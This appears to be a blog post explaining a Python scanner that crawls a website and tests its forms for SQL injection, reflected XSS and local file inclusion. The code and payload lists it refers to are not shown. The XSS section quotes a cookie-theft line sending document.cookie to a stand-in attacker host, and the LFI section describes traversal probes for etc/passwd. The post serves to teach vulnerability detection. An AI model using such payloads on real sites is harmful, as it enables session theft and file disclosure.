Modern web-applications, if not sufficiently protected through various mitigating factors, are potentially vulnerable to a wide variety of exploitation mechanisms. This list is quite large and this post will only be discussing the detection of three basic vulnerability types; Error-Based MySQL Injection, Reflected Cross-Site Scripting (R-XSS) and Local File Inclusions (LFI). Additionally, the Python script utilized depends upon the installation of two separate third-party modules to simplify different aspects of request generation and HTML parsing; BeautifulSoup4 and HTTP Requests are two extremely useful Python modules which make interacting with web-resources extremely simple when compared to manual interaction. Links will be included at the bottom of this post.
The first stage of scanning for vulnerabilities is being able to effectively crawl through a given site while not going out of scope. The created script is customizable in terms of crawling-depth and attempts to find links on every sequentially discovered page and perform additional crawling on all discovered links. The main portion of the function for crawling a given host is shown below.
The above function takes a ‘host’ as input and establishes a ‘base_domain’ in order to ensure links which are not part of the base domain path are not scanned. This prevents going out-of-scope with respect to the current scan, such as not crawling ‘Youtube’ if a given site happens to link to it. ‘requests.get(host)’ is a useful function from the ‘requests’ module which automatically forms a properly formed HTTP GET request to the target and the following ‘soup_init’ beautifies the HTTP response using BeautifulSoup4. Additionally, BS4 is used to parse for all links which exist in the response. Links are iterated through and new requests are issued for all detected target links, continuing on until reaching the specified depth given in the user arguments. We can also observe that for links which are not previously existing within the list ‘link_list[]’, they are appended to the end of the list. This list is iterated through and utilized in the later vulnerability scanning functions and acts as a precursor for target host generation.
Reflected XSS is a problem which typically results as a lack of input or output sanitization on the server-side resulting in the potential for JavaScript to be echoed back to the client on vulnerable web-pages. This may include a site which includes a login form and echoes the username back upon a failed or successful login attempt. If such a site does not properly utilize XSS Protection Headers and sanitization of allowed input, the strings echoed back to the client could potentially include malicious JavaScript. A basic example commonly used to test for the existence of reflected XSS is JavaScript of the form ‘alert(“Test”)’, which if successful will result in a pop-up appearing on the client containing the text ‘Test’. Malicious attackers will typically craft a link containing JavaScript which includes commands such as ‘document.location=’http://attacker-website/cookie-theft.php?cookie=’+document.cookie;’. This JavaScript would be embedded in a seemingly innocuous link and sent to the victim who would then unwittingly send their current session cookie to the attackers pre-determined PHP script.
The script created has the ability to iterate through the links discovered through the crawling function and test each of them for potential reflected XSS injections via dynamic form-discovery, form-population and response analysis. The main code boot-strapping this functionality is shown below.
The above code is part of the ‘main’ function and iterates through detected host URIs in the ‘link_list’ list which was previously populated through the crawling capabilities of the script. Once a test for a given host is complete, a mini-report is generated and a file is written outputting the results for all XSS tests and letting investigators know which ones resulted in the detection of a potential reflected-XSS vulnerability. As visible above, each host is passed to the ‘xss_test()’ function as a parameter argument, with snippets from ‘xss_test’ given below.
The code portion above represents the initial setup for reflected XSS testing, taking in a host parameter argument, sending an initial request to establish a base-line for form analysis and initializing an array for storing payloads resulting in potential XSS vulnerabilities. It is also observed that a file named ‘xss.txt’ is opened and read line-by-line; this file contains potential payloads for XSS vulnerability detection and will be shown momentarily. The script attempts to find all HTML forms present on the page, again utilizing BS4 to perform parsing of the HTTP response and then stores all forms in a dynamic variable for later iteration. A snippet of the payloads document as it currently exists is shown below.
After loading the available payloads, the script proceeds to iterate through each available payload, then through each available form and finally each available form key in a ‘nested for loop’ fashion. This makes it relatively inefficient but it does provide good overall coverage for each payload, form and key per form submission. A sample of the next part of the script is shown below, existing within the ‘for loop’ for payload iteration.
As seen above, each form present in ‘all_forms’ is used and currently this script attempts to seek out login forms but has also been modified to include all forms in a more recent iteration to attempt to have wider overall site coverage. The script then retrieves the actions, methods and available inputs of the form in question and creates a dictionary key:value pair for the original names and values of all form elements, storing the dictionary as ‘form_data’. For every form, a final nested ‘for loop’ is utilized which iterates through all keys present in the form and attempts to set the related value to the current payload and then force a form submission in order to analyze the response. This section is shown below.
The above code snippet represents the main portion for XSS testing on GET-action forms, with POST-action forms looking very similar and included directly below within the same for loop. A new dictionary named ‘form_data_modded’ is created as a copy of the original ‘form_data’ to work upon it and not alter the original so that it can be recycled and used later. For each key:value pair in ‘form_data’, the keys are iterated through and the corresponding value is set to the currently tested payload. A GET/POST request is then made with the modded parameters and the HTTP response is analyzed to look for the existence of the embedded JavaScript in the response; if detected, the URL request which generated the alert is appended to the list of potential XSS triggers. Otherwise, the next key:value pair is tested and the script continues in either case. An example demonstrating this in action is shown below.
The above code runs until all payloads, forms and key:value pairs are iterated through and would then continue to operate on every host present in “link_list”. The SQL testing is very similar in nature and also utilizes a text file containing pre-built SQL payloads intended to test for error-based MySQL injection. Additionally, a list of ‘special’ characters and known errors is specified in code. The special character list consists of items such as ‘/’, ‘;’, ‘), (‘, ‘– ‘ and many more characters which are dynamically formed against each payload and used as suffixes and prefixes in order to test a variety of payload combinations. Additionally, similarly to the XSS tests, detected key:value pairs are iterated through and generated payloads are inserted into each value possible in every detected form in order to gain full application coverage. Posting code snippets of the SQL test would not be efficient due to their similarity but they can be viewed in the source code linked towards the end of this post. Instead, an example of both SQL injection failure and detection are shown below.
The final mechanism included in the script is a test for Local File Inclusion; this test is slightly separate from the others as it does not currently include compatibility with the crawling element but this will be added in a future update. Currently, input for LFI testing must be in the form of ‘http://URL.php?page=’. The script will detect the parameter lacking a value and will then begin injections from the given parameter using a combination of variably encoded double-dots (‘..’) and slashes given in two separate text files. Every encoding of double-dot is iterated through with every type of slash available in the given lists and taken to a depth of five iterations. A request is made on each attempt and the HTTP response is analyzed in order to determine if ‘etc/passwd’ exists in the response, the presence of which would indicate a successful local file inclusion has occurred. It is a relatively naive implementation and also inefficient but it does succeed in testing for LFI vulnerabilities against known GET parameters. A list of the currently used double-dots and slashes are given below along with an example of a successful LFI detection in operation.
Overall, this script is poorly performing but does manage to detect the given vulnerabilities on sites which are vulnerable to them. Hopefully this helps demonstrate some basic ways through which these classes of vulnerabilities can be detected and furthers overall knowledge on the topic for those who are curious.
HTTP Requests : http://docs.python-requests.org/en/master/
Beautiful Soup : https://www.crummy.com/software/BeautifulSoup/